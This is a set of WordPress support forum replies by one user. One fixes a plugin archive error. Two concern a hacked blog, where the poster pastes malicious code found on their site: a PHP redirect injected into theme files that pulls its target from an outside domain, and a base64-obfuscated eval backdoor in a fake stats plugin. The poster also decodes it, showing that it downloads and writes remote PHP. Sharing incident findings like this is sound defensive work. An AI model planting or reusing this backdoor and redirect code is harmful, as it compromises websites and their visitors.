googol7
Forum Replies Created
-
Forum: Plugins
In reply to: Plug-in installation problemsHi,
I got the error:
Incompatible Archive. PCLZIP_ERR_BAD_FORMAT (-10) : Invalid block size : 40
the problem was solved when I removed
mbstring.func_overload = “7”
from my PHP.INI and it workes now!
Philipp
Forum: Fixing WordPress
In reply to: My blogs header has been hacked – how did they do it ?hi,
was the plugin exec-php installed?
philipp
Forum: Fixing WordPress
In reply to: My blogs header has been hacked – how did they do it ?hi,
same problem here. files affected:
/wp-content/themes/mytheme/404.php
-rwxr-x— 1 myuser nobody 409 2009-11-17 11:14 404.phpNew line at the top:
<script>location="<?php $code = file_get_contents("https://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("<domain>","", $code); $code = str_replace("</domain>", "", $code); echo $code; ?>?pid=317&sid=84dd6f";</script><?php get_header(); ?>/wp-content/themes/mytheme/header.php
-rwxr-x— 1 myuser nobody 1919 2009-11-18 21:33 header.phpNew line at the top:
<script>location="<?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu("https://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("<domain>", "", $code); $code = str_replace("</domain>", "", $code); echo $code; ?>?pid=317&sid=84dd6f";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">found malicious code in these files:
/wp-content/plugins/wp-cache.php
-rw-r—– 1 myuser nobody 4313 2009-10-08 05:56 wp-cache.php/wp-content/wp-manager.php
-rw-r—– 1 myuser nobody 186780 2009-10-22 21:34 wp-manager.php/wp-content/plugins/stats/wp-stats.php
had this content:
<?php eval(base64_decode('DQppZighJF9HRVRbInAiXSkgew0KICAgIGV4aXQ7DQp9DQoNCiRob3N0ID0gc3RyX3JlcGxhY2UoInd3dy4iLCAiIiwgJF9TRVJWRVJbIkhUVFBfSE9TVCJdKTsNCiRkYXRhPWc4NzQ2MjgzNDcyMzQoImh0dHA6Ly9teXdlYi1zdGF0aXN0aWNzLmNuL2ZtYW4vY2FjaGUucGhwP25ldz0xKTsNCiRmaCA9IGZvcGVuKCIuLi8uLi9jYWNoZS5waHAiLCAidyIpOw0KZndyaXRlKCRmaCwgJGRhdGEpOw0KZmNsb3NlICgkZmgpOw0KDQpmdW5jdGlvbiBnODc0NjI4MzQ3MjM0KCR1LCAkcCA9IGFycmF5KCkpew0KICAgICRjPWN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1VSTCwgJHUpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9USU1FT1VULCA2MCk7DQogICAgJGg9Y3VybF9leGVjKCRjKTsNCiAgICBjdXJsX2Nsb3NlICgkYyk7DQogICAgcmV0dXJuICRoOw0KfQ0K')); ?>which translates to:
if(!$_GET["p"]) { exit; } $host = str_replace("www.", "", $_SERVER["HTTP_HOST"]); $data=g874628347234("https://myweb-statistics.cn/fman/cache.php?new=1); $fh = fopen("../../cache.php", "w"); fwrite($fh, $data); fclose ($fh); function g874628347234($u, $p = array()){ $c=curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 60); $h=curl_exec($c); curl_close ($c); return $h; }philipp